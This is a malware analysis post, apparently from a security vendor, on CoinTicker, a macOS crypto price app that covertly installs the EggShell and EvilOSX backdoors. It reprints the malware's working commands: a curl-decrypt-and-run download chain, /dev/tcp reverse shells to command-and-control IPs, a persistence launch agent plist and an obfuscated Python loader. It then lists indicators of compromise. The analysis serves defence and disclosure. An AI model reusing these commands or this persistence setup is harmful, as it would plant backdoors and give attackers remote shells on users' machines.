An astute contributor to our forums going by the handle 1vladimir noticed that an app named CoinTicker was exhibiting some fishy behavior over the weekend. It seems that the app is covertly installing not just one but two different backdoors.
BehaviorsThe CoinTicker app, on the surface, appears to be a legitimate application that could potentially be useful to someone who has invested in cryptocurrencies. Once downloaded, the app displays an icon in the menu bar that gives information about the current price of Bitcoin.
The app's preferences allow the user to customize the display, showing information about a wide variety of cryptocurrencies, including Bitcoin, Etherium, and Monero.
Although this functionality seems to be legitimate, the app is actually up to no good in the background, unbeknownst to the user. Without any signs of trouble, such as requests for authentication to root, there's nothing to suggest to the user that anything is wrong.
When launched, however, the app downloads and installs components of two different open-source backdoors: EvilOSX and EggShell.
The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS:
nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.pyThe first part of the command downloads an encoded file from a Github page belonging to a user named "youarenick" and saves that file to a hidden file named .info.enc in /private/tmp/. Next, it uses openssl to decode that file into a hidden Python file named .info.py. Finally, it executes the resulting Python script.
The .info.py script performs multiple tasks. First it opens a reverse shell connection to a command & control server, using the following command:
nohup bash &> /dev/tcp/184.108.40.206/2280 0>&1(The domain seednode3.parsicoin.net resolves to this IP address.)
Next, it downloads the the EggShell mach-o binary, saving it to /tmp/espl:
curl -k -L -o /tmp/espl https://github.com/youarenick/newProject/raw/master/macFinally, it creates and runs a shell script at /tmp/.server.sh, which also establishes a reverse shell.
#! /bin/bash nohup bash &> /dev/tcp/220.127.116.11/2280 0>&1The CoinTicker app also creates a user launch agent, named .espl.plist, that runs the same command periodically:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>AbandonProcessGroup</key> <true/> <key>Label</key> <string>com.apple.espl</string> <key>ProgramArguments</key> <array> <string>sh</string> <string>-c</string> <string>nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py</string> </array> <key>RunAtLoad</key> <true/> <key>StartInterval</key> <integer>90</integer> </dict> </plist>If it seems like this results in the espl binary being launched multiple times, that is indeed the case.
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import getpass import uuidExtracting the script reveals that it is the bot.py script from the EvilOSX backdoor made by Github user Marten4n6.
def get_uid(): return "".join(x.encode("hex") for x in (getpass.getuser() + "-" + str(uuid.getnode())))
exec("".join(os.popen("echo 'U2FsdGVkX19GsbCj4lq2hzo27vqseHTtKbNTx9 ... TjO1GlH1+7cP7pDYa8ykBquk4WhU0/UqE' | openssl aes-256-cbc -A -d -a -k %s -md md5" % get_uid()).readlines()))
#!/usr/bin/env python # -*- coding: utf-8 -*- """Minimal bot which loads modules as they are needed from the server.""" __author__ = "Marten4n6" __license__ = "GPLv3" __version__ = "4.1.1" ...This script has been customized to cause the backdoor to communicate with a server at 18.104.22.168 on port 1339. The malware also creates a user launch agent named com.apple.EOFHXpQvqhr.plist designed to keep this script running.
ImplicationsAlthough it's unknown exactly what goal the hacker behind this malware had in mind, both EggShell and EvilOSX are broad-spectrum backdoors that can be used for a variety of purposes. Since the malware is distributed through a cryptocurrency app, however, it seems likely that the malware is meant to gain access to users' cryptocurrency wallets for the purpose of stealing coins.
At first, this looked like it could have been a supply chain attack, in which a legitimate app's website is hacked to distribute a malicious version of the app. Such attacks have happened multiple times in the past, such as when the Transmission site was hacked (twice) to distribute KeRanger and Keydnap, or when a Handbrake mirror server was hacked to distribute Proton.
However, on further inspection, it looks like this app was probably never legitimate to begin with. First, the app is distributed via a domain named coin-sticker.com. This is close to, but not quite the same as, the name of the app. Getting the domain name wrong seems awfully sloppy if this were a legitimate app. Adding further suspicion, it seems that this domain was just registered a few months ago on July 13.
For this reason, Malwarebytes for Mac detects the CoinTicker application in addition to the other components of this malware, as OSX.EvilEgg.
One interesting note about this malware is that none of it requires anything other than normal user permissions. Root permissions are not needed. There is often an erroneous over-emphasis on malware's need for root privileges, but this malware is a perfect demonstration that malware does not need such privileges to have high potential for danger.
Indicators of CompromiseFiles created:
/private/tmp/.info.enc /private/tmp/.info.py /private/tmp/.server.sh /private/tmp/espl ~/Library/LaunchAgents/.espl.plist ~/Library/LaunchAgents/com.apple.[random string].plist ~/Library/Containers/.[random string]/[random string]Network connections:
CoinTicker.zip f4f45e16dd276b948dedd8a5f8d55c9e1e60884b9fe00143cb092eed693cddc4 espl efb5b32f87bfd6089912073cb33850c58640d59cb52d8c63853d97b4771bc490